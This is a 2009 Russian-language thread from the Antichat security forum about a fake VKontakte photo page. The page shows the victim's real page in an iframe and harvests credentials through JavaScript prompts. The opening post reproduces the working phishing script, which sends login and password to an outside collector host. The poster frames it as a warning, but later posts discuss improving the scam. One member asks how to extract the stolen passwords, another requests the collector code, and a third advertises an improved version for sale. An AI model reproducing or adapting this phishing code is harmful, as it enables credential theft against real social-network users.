ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
Вот и нашел я первый фейк с iframe! |
29.11.2009, 10:38
|
|
Участник форума
Регистрация: 14.01.2009
Сообщений: 194
Провел на форуме:
798217
Репутация:
44
|
|
Вот и нашел я первый фейк с iframe!
http://vkontakte-fotℴ.com/photo23385409_141879053
Это ФЕЙК не вводите туда свои данные!
Ну расскажу по-подробнее (рассмотрим код):
1)Сам iframe
Код HTML:
<iframe id=ctree" name="tree" src="http://vkontakte.ru/photo23385409_141879053" frameborder="0" marginheight="0" marginwidth="0" width="100%" height="100%" scrolling="auto"></iframe>
Как мы видим введет на не закрытую страницу с фотками!
http://vkontakte.ru/photo23385409_141879053
2) Java код (карявый)
Код:
var login = "";
var login_pass = false;
var pass = "";
var pass_pass = false;
var emailPattern = /^[a-zA-Z0-9._-]+@[a-zA-Z0-9.-]+\.[a-zA-Z]{2,4}$/;
var ii = 100;
function p()
{
location.href='http://vkontakte.ru/';
}
function loadFn()
{
while(ii > 10)
{
if(login_pass == false)
{
login = window.prompt("Вконтакте участились случаи спама, Поэтому мы проводим тестирование новой системы защиты.\nВведите E-mail или Логин:",'Ваш e-mail');
if(emailPattern.test(login))
{
login_pass = true;
}
}
if(pass_pass == false && login_pass == true)
{
pass = window.prompt("Введите пароль",'');
if(typeof pass == 'string')
{
if(pass.length > 3 )
{
pass_pass = true;
}
}
else
{
pass = window.prompt("Введите ваш пароль",'');
}
}
if(login_pass == true && pass_pass == true)
{
img = new Image();
img.onload = p();
img.src = "http://vauction.biz/log.php?c=" + login + ';' + pass;
alert('Спасибо! Вы успешно авторизованы.');
break;
}
}
}
Ну все достаточно просто проверка орфографии майла и пароль больше трех символов,
Если всё верно с помощью гет запроса передаються данные на
http://vauction.biz/log.php?c=" + login + ';' + pass;
======================================
Вопрос к людям со стажем!
что можно придумать с http://vauction.biz/log.php?c=" + login + ';' + pass;
ну вы понимаете о чем я!
======================================
Это не моё!
Я просто привёл пример!!!
Потому что увидив пример использование,я понял,что сейчас можно очень красиво людей разводить.
Много очень много идей сейчас в голове,но очень мало времени!!!
Сейчас пошел заниматься,как всё закончу,может и напишу свой фейк с iframe.
Потому что я думаю,так убедить пользователя ввести свой пароль куда проще,когда он видет свою страницу!
Последний раз редактировалось ZnikiR; 29.11.2009 в 11:31..
|
|
|
29.11.2009, 10:54
|
|
Участник форума
Регистрация: 28.10.2009
Сообщений: 129
Провел на форуме:
460561
Репутация:
67
|
|
1 минус, вконтакте еще ники есть, а тут на имейлы настроено.
|
|
|
|
29.11.2009, 11:08
|
|
Участник форума
Регистрация: 14.01.2009
Сообщений: 194
Провел на форуме:
798217
Репутация:
44
|
|
Сообщение от Adekvatnyj
1 минус, вконтакте еще ники есть, а тут на имейлы настроено.
Не понял тебя?
скажу,что это очень нормальный способ.
Потому как Свежый,мало кто из пользователей сталкивался,и если вывести его страницу в iframe и доделать этот фейк,то можно очень сильно разводить людей.
У меня кстати мысли по фейку появились!Причем очень интерестные!
|
|
|
|
29.11.2009, 11:12
|
|
Участник форума
Регистрация: 28.10.2009
Сообщений: 129
Провел на форуме:
460561
Репутация:
67
|
|
Заходить можна не только через имейлы, а и через ники (кто зарегился недавно, с активацией), этим способом ты пропускаешь довольно сладкие акки.
|
|
|
|
29.11.2009, 11:22
|
|
Участник форума
Регистрация: 28.10.2009
Сообщений: 129
Провел на форуме:
460561
Репутация:
67
|
|
Виснет броузер.
Захожу с ИЕ
|
|
|
|
29.11.2009, 12:27
|
|
Участник форума
Регистрация: 14.01.2009
Сообщений: 194
Провел на форуме:
798217
Репутация:
44
|
|
http://vauction.biz/log.php
у меня вопрос скажите,он просто принимает все запросы?без обработки?
у меня идея,по идее же можно как-то заставить его нам показать себя(т.е. свой код)?
если да,то как это можно сделать?
Есть предложение вытащить пассы! )))
|
|
|
|
29.11.2009, 13:51
|
|
Moderator - Level 7
Регистрация: 06.02.2009
Сообщений: 195
Провел на форуме:
2485155
Репутация:
719
|
|
вот ты гений-поисковик, почитать форум впадлу было? этот фейк находили еще три месяца назад
http://forum.antichat.ru/showthread.php?p=1637189
|
|
|
|
29.11.2009, 17:59
|
|
Познающий
Регистрация: 11.10.2009
Сообщений: 84
Провел на форуме:
1003859
Репутация:
0
|
|
кто нибудь может код для log.php скинуть?
|
|
|
|
29.11.2009, 18:06
|
|
Постоянный
Регистрация: 06.04.2009
Сообщений: 383
Провел на форуме:
1288105
Репутация:
328
|
|
Сообщение от Adekvatnyj
1 минус, вконтакте еще ники есть, а тут на имейлы настроено.
а этот ник еще можно добавлять , если раньше зарегался ? если да то где ?
|
|
|
|
29.11.2009, 19:00
|
|
Участник форума
Регистрация: 20.04.2007
Сообщений: 174
Провел на форуме:
2310282
Репутация:
149
|
|
продам усовершенствованный сабж http://vkotnake.ru/photo23385409_141879053
подробности здесь http://forum.antichat.ru/thread157537.html
P.S. Сволочи! http://www.phishtank.com/phish_detail.php?phish_id=874843
Последний раз редактировалось GlooK; 30.11.2009 в 18:03..
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
